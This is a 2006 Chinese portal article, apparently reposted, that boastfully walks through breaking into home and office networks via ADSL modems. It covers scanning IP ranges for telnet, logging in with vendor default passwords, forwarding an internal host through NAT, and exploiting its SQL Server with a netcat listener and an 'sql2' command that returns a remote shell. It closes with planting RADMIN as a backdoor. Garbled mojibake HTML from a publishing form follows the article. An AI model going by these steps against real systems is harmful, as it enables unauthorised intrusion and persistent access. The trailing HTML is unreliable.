战胜牛皮癣全球震惊 哮喘支气管新药问世 视频:日本美少女写真
 
骇客学堂:教你穿透ADSL路由入侵内网
2006-12-25 10:57:03  赛迪网  lvvl  

   

也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSL MODEM的 路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得

一.扫描

现在很多ADSL MODEM都是通过 80 23 21 三个端口来管理,但80 21端口有很多服务器都有打开,没怎么特征性,于是我选择了23端口,打开我的至爱:SUPPERSCAN,填上我所在地区的IP段,(跨多几段都没关系,反正SUPPERSCAN的速度就是快)眨眼间,结果出来了,开23的主机还真不小啊:)我挑了几台出来,在浏览器那里输入IP:218.xxx.xxx.xxx,OK。登陆对话框出来了,输入USER:ADSL pass:adsl1234(因为我这里的adsl modem一般是华硕的,缺省是adsl adsl1234)bingle 一矢中的,现在我就是上帝。

二.映射

入侵已经成功了一半,要进一步入侵内网,我门要进行端口映射,但是我连内网的拓扑,都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?在此,我选择了猜测。一般来说,MODEM的内网IP缺省是192.168.1.1,而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192。168。1。2的端口映射出来就行了(但如果使用了dhcp就麻烦了)但是192。168。1。2到底开放了什么端口,我们根本就不知道啊,呵呵,既然不知道,那么我就把他整台主机透明地映射到外网,具体做法如下:进入NAT选项---添加NAT规则---BAMID---填入主机IP:192。168。1。2,到此192。168。1。2已经透明地映射到192。168。1。1上了,我们访问ADSL MODEM就等于访问主机192。168。1。2了

三。检测漏洞

现在我们再请出SUPPERSCAN对218。xxx.xxx.xxx进行扫描,呵,看到没有?扫描结果已经不同了,开放的端口是139 1433等,刚才只是开放了80 23 21 而已(也就是说我们的映射已经成功了)该是X-SCAN出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员还不算低B啊

四。溢出

既然没有弱口令,也没开80,那只好从逸出方面着手了,但没开80 21 也就webdav .sevr-u的溢出没戏了,很自然,我向导了RPC溢出,但实践证明RPC溢出也是不行的,LSASS溢出也不行

五。募然回首,那人却在,灯火阑珊处

开来这管理员还是比较负责的,该打的补丁都打上了,这时侯,我的目光转移到1433上了(嘿,不知道他打了SQL补丁没有?,心动不如行动,现在只好死马当活马医了,于是

nc -v -l 99

sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99

bingle 成功地得到一个shell了

六。设置后门

到这里,我们的入侵已经成功了,余下的是扫尾留后门,至于后门,我一般都是用FTP上传RADMIN上去的,呵呵,这里不详谈了,相信各位都知道。


下一篇:手动查杀电脑病毒的一些基本方法
21CN.COM - 女性频道
  今日关注 时尚手机 | 玩转数码 | 色友天堂 | 趣味下载  
韩国CG作品赏
怪异的笔记本
碉楼
旧梦重温
智能娱乐皇
美女壁纸下载
本文关键字:   
藏药七十味巧治中风偏瘫 非手术治疗胆囊息肉 老婆口述:老公早泄怎么办?
老公:阳痿早泄怎么办 疱疹、湿疣病毒也会变异!! 脱发、生发两个头痛话题
得了疱疹、湿疣,别滥用药!! 两性-视频:18岁以下勿点 红斑狼疮,狼疮肾炎治愈有方!
金属男人专属强机 2500元经济DC 热门笔记本精彩导购 游戏影音PC导购
 [手机] 焦点提前揭密 国庆卖得最红火手机  [本本一族] 6999至9999元 主流游戏本横评
 [手机] 体验浪漫 魅力纯美白色手机导购  [PC地带] 直击主流 800元级别965主板点评
 [数码] 降到7XX!aigo视频E858/E868再降200  [下载] 连连看 V3.9 0710 简体中文完全版
 [数码] 独家呈现 尼康D80试拍诱惑泳装MM  [下载] 多媒体插件:速配歌词 2006 独立版
 [软件] Photoshop实例:制作面部护肤化妆品  [软件] 2006韩国插画名师各类风格插画大赏
  新闻论坛     社会热点    网友贴图    图片故事     型男索女     图看天下
 
 
·专家称蜂蜜治伤疗效佳 ·心脏病会使人精神抑郁 ·五理由拒绝美黑! ·如何让皮肤更光嫩?
·小调味品包含大健康! ·乱吃补药小心肝坏死 ·夏日巧饮健康茶! ·轻松消除将军肚的方法
·夏季健身提防热疾病! ·搓身体8处强身健体! ·夏季腹泻4种常用药 ·注意人体的五大保健区
·提醒:蜂蜜滋养要得法 ·夏季祛痘忌日晒! ·腰突症的认识误区 ·怕冷请您别喝夏桑菊

经营许可证编号:粤ICP证010001

世纪龙信息网络有限责任公司版权所有 服务声明


扴D挩s?/title> <style type="text/stylesheet"> <!-- form{ margin:0; padding:0; } --> </style> </head> <body> <link href="/css/style.css" rel="stylesheet" type="text/css"> <script language="JavaScript" src="/js/comm.js"></script> <script language="javascript"> window.status='SM(7:iter'; </script> <script language="javascript" type=""> function beforeSub1() { var oType = document.all.item("typeID"); oType[0].value = oType[1].value; } function beforeSub2() { var oTemplateID = document.all.item("templateID"); if (oTemplateID.options[oTemplateID.selectedIndex].value == "-1") { alert("鱄 ?"); return false; } else { return true; } } function beforeSub3(actValue) { var oAction = document.all.item("actionType"); oAction.value = actValue; } </script> <table width="100%" border="0" cellpadding="0" cellspacing="0" class="conListV"> <form name="templateForm" method="post" action="/publish/saveTemplate.do" enctype="multipart/form-data" onSubmit="javascript:beforeSub1();"> <tr> <td width="100">丐!</td> <td> </td> </tr> <tr> <td width="100" align="center"><input type="checkbox" name="isDefault1" value="1"></td> <td align="left"> <input type="file" name="template1" value=""> <select name="templateType1"><option value="0">杣</option> <option value="1">hu</option> <option value="2">吂u</option> <option value="3">lq杣</option> <option value="4">lqhu</option> <option value="5">lq吂u</option></select> </td> </tr> <tr> <td width="100" align="center"><input type="checkbox" name="isDefault2" value="1"></td> <td align="left"> <input type="file" name="template2" value=""> <select name="templateType2"><option value="0">杣</option> <option value="1">hu</option> <option value="2">吂u</option> <option value="3">lq杣</option> <option value="4">lqhu</option> <option value="5">lq吂u</option></select> </td> </tr> <tr> <td width="100" align="center"><input type="checkbox" name="isDefault3" value="1"></td> <td align="left"> <input type="file" name="template3" value=""> <select name="templateType3"><option value="0">杣</option> <option value="1">hu</option> <option value="2">吂u</option> <option value="3">lq杣</option> <option value="4">lqhu</option> <option value="5">lq吂u</option></select> </td> </tr> <tr> <td width="100" align="center"><input type="checkbox" name="isDefault4" value="1"></td> <td align="left"> <input type="file" name="template4" value=""> <select name="templateType4"><option value="0">杣</option> <option value="1">hu</option> <option value="2">吂u</option> <option value="3">lq杣</option> <option value="4">lqhu</option> <option value="5">lq吂u</option></select> </td> </tr> <tr> <td width="100" align="center"><input type="checkbox" name="isDefault5" value="1"></td> <td align="left"> <input type="file" name="template5" value=""> <select name="templateType5"><option value="0">杣</option> <option value="1">hu</option> <option value="2">吂u</option> <option value="3">lq杣</option> <option value="4">lqhu</option> <option value="5">lq吂u</option></select> <input type="hidden" name="typeID" value=""> <input type="submit" value=" "> </td> </tr> </form> <form name="templateListForm" method="post" action="/publish/handleTemplate.do" onSubmit="javascript:return beforeSub2();"> <tr> <td colspan="2"> <select name="templateID"><option value="-1">??/option> <option value="1587540">杣--index-it-060809.htm(丐)</option> <option value="1544224">lq吂u--article_it_060626.html(丐)</option> <option value="1193533">lqhu--publiclist050614.htm(丐)</option></select> <input type="hidden" name="actionType" value=""> <input type="hidden" name="typeID" value="3600"> <input type="submit" value=" }" onClick="javascript:beforeSub3('1');"> <input type="submit" value="緉丐" onClick="javascript:beforeSub3('2');"> <input type="submit" value=" d" onClick="javascript:beforeSub3('3');"> </td> </tr> </form> </table> </body> </html:html>